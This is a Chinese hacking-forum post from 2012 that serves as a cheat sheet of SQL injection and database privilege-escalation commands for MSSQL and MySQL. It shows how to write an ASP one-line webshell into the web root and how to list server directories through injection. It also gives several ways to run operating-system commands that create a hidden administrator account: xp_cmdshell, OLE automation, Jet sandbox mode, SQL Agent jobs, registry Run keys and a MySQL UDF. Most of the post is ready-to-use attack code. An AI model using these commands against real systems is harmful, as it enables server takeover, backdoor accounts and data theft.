找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3105|回复: 0
打印 上一主题 下一主题

mssql实用命令及导出一句话

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:49:59 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
MSSQL语句导出一句话木马5 ]& Q" ^; A# v: m
首先确定网站的WEB路径( A9 W2 k" |1 }* b# E- V
;create table pcguest(pc char(255));-- //建一个表用作插入一句话木马3 w: K% s# C, [- o
* g: O% [$ h2 ~# A0 w% r
;insert into pcguest(pc) values ('%3c%25execute request(%22p%22)%25%3e');--
. A/ k* l5 }# H5 q+ S* P1 m4 Z: \5 p//将一句话木马插入表中
0 x3 F+ M5 v* Q4 x+ v/ X- [/ d1 h2 z
;execute sp_makewebtask @outputfile='E:\Inetpub\wwwroot\PC.ASP',@query='select pc from pcguest';-- 8 y8 M3 [5 n' T; _
//导出一个ASP文件
; E1 w- N) T; w9 e! v1 Z2 b
4 r' s' m1 Q. c2 p4 N. ^& Z9 N" y0 V1 u+ w2 ?
关于MSSQL列目录
& h5 b( j  ]- T. H# K;CREATE TABLE pctest(subdirectory VARCHAR(100),depth VARCHAR(100),[file] VARCHAR(100)) //建一个新表- p; r  A+ f" a! Z  q
Insert pctest exec master..xp_dirtree "d:\app\",1,1 //用xp_dirtree列目录结果导入所建成的表
0 n# V8 R! H% B2 l5 {- D
! p* N, r) G0 S# l0 M- @4 L7 Kand (select Count(1) from [pctest]) between 0 and 99 //判断表中字段数来知道有几个文夹和目录
5 J" D' C0 A/ Q1 |" b/ e- C4 ]. t( R+ Q! ^) z/ Y! Z: E2 W1 {9 R) @" `# D+ Z! F
And (Select Top 1 len(Cast([file] as varchar(8000))+subdirectory) From (Select Top 2 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 0 and 20 //猜解第二个字段7 h+ m' W2 t5 J' ^3 ?, ^
9 _4 B/ T* z$ d3 q+ o
And (Select Top 1 unicode(substring(Cast([file] as varchar(8000))+subdirectory,1,1)) From (Select Top 1 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 30 and 130 //逐一猜解字段名的每位字符
& s1 \8 j- Y( Y9 U* z3 V& {4 n: @) u

# j7 V, g) \% t5 d数据库版本和权限查看4 T* |: e+ [$ x1 z+ s$ s( A
and 1=(select @@VERSION) //查看详细的数据库信息.) L) }- s6 j! T+ X7 n$ W4 ~9 e
and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));-- //查看权限是不是SA
  F0 u( l, M, x, y% g; N% Yand 1=(SELECT IS_MEMBER('db_owner'));-- //查看权限是不是DB_ONWER5 E& ~- x8 R# L2 `( E

; E7 n, ?. m, ?* Z0 }1 R# |
+ G$ ?; v+ o6 c& J% E5 a! t1.利用xp_cmdshell执行命令
& r) l4 C4 d" `9 U- Cexec master..xp_cmdshell 'net user rfire 123456 /add'
" M5 j, l' Z5 A  {' z( j; cexec master..xp_cmdshell 'net localgroup administrators rfire /add'8 J9 D# y' }: `3 \1 z$ _- w6 |
+ e, i1 B- U) I8 ?2 v1 `! @
恢复xp_cmdshell存储过程
$ T4 A0 j# z7 [$ dExec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
8 O, o7 d* c1 n8 \. F$ j  z  X4 X) I3 u" e, X2 r" B. ~% Q. y
  C2 N; z$ X% B* d
2.利用SP_OAcreate和SP_OAMETHOD执行命令( }9 K/ z) A5 W, t, p/ f# K
在wscript.shell组件存在的情况下以及xp_cmdshell和xplog70.dll都被删除的情况下
8 ]4 Q& z, e5 K) a7 lDECLARE @shell INT //建立一个@shell实体& C3 o6 t4 Q) C6 d( m' Z" m
EXEC SP_OAcreate 'wscript.shell',@shell out //创建OLE对象的实例- U" y# m* R* K% V7 Q) U* j
EXEC SP_OAMETHOD @shell,'run',null,'net user rfire 123456 /add' //调用@shell这个实例5 l  r) g& S5 X  z& I
" z: \' P8 w3 [* P9 d3 {6 S% Q- A
. y& o, \# t. M: ^+ n0 }
3.利用沙盒模式
9 N* T2 ~+ u5 _! U6 {9 i先利用xp_regwrite(前提是要求xp_regwrite存在)改注册表,然后用OpenRowSet访问系统自身mdb文件,然后执行SQL语句。2 R4 N( o' A" ^# K
开启沙盒模式:
: A' W  J* J) S+ q6 ~( ]  rEXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engine','SandBoxMode','REG_DWORD',0. W; F  s3 k% j

6 h( Z0 d7 X) p6 q' \4 i执行命令:! r( z  b3 L/ x7 C7 Z
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user rfire 123456 /add")');; p, x# D/ R+ v+ L  m- N) u9 X% y

+ B1 b5 ~0 X; h0 K
3 a1 |4 u$ X% P8 _; {& _5 h  Q/ b4.利用SQL代理执行命令
5 u- J8 B! _' V, r8 \' V, hEXEC master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT' //使用xp_servicecontrol启动SQLSERVERAGENT服务. z- B* ]3 v$ Y( Q
: q7 A0 S: B; v! a
执行命令:
- \5 }7 H2 U  M) `1 W) g# q. _1 Guse msdb exec sp_delete_job null,'x' //进入msdb数据库,删除x作业防止出错& Q3 E- h7 O2 n1 z* h
exec sp_add_job 'x'
5 [0 O6 b2 i* i! u2 H' Zexec sp_add_jobstep Null,'x',Null,'1','CMDEXEC','cmd /c net user rfire 123456 /add' //添加作业
' |/ ?+ S+ P& ], V9 c1 @1 dexec sp_add_jobserver Null,'x',@@servername exec sp_add_job 'x' //启动这个作业
( t, }! M; h( Y. t( }5 L( V. b4 s" m( `  l( p2 r5 L

# b- _$ c$ e+ X% \( e- P5.利用注册表项执行命令(用xp_regwrite将执行命令写入启动项)
, ?" F2 L% `; L! \% R+ sEXEC master.dbo.xp_regwrite 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run\','shell'.'REG_SZ','C:\windows\system32\cmd.exe /c net user rfire 123456 /add'
2 b  g& F4 T: }3 H
1 _- y( L, l3 M, j3 [* F  y8 S' V# r9 {0 u- W
6.MYSQL的命令执行9 v. a8 e& U: m1 t$ T
MYSQL的UDF自定义函数提权(要求账号拥有insert和delete权限)7 i7 O  j, A9 y: S
首先要在su.php下导出c:\windows\udf.dll. o4 t) _1 R" g8 `$ d6 \9 B& A
导出后执行创建自定义函数命令:
& @9 t, u# Y4 Z% iCreate Function cmdshell returns string soname 'udf.dll'& W, L- ?4 v. N
执行命令! k/ K) a5 R0 T9 I6 B' y1 I5 z2 P
select cmdshell('net user rfire 123456 /add'); K9 G: f' _% C" g* `; Q1 e
执行后删除函数 drop function cmdshell
$ w! i" o% O; b* V
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表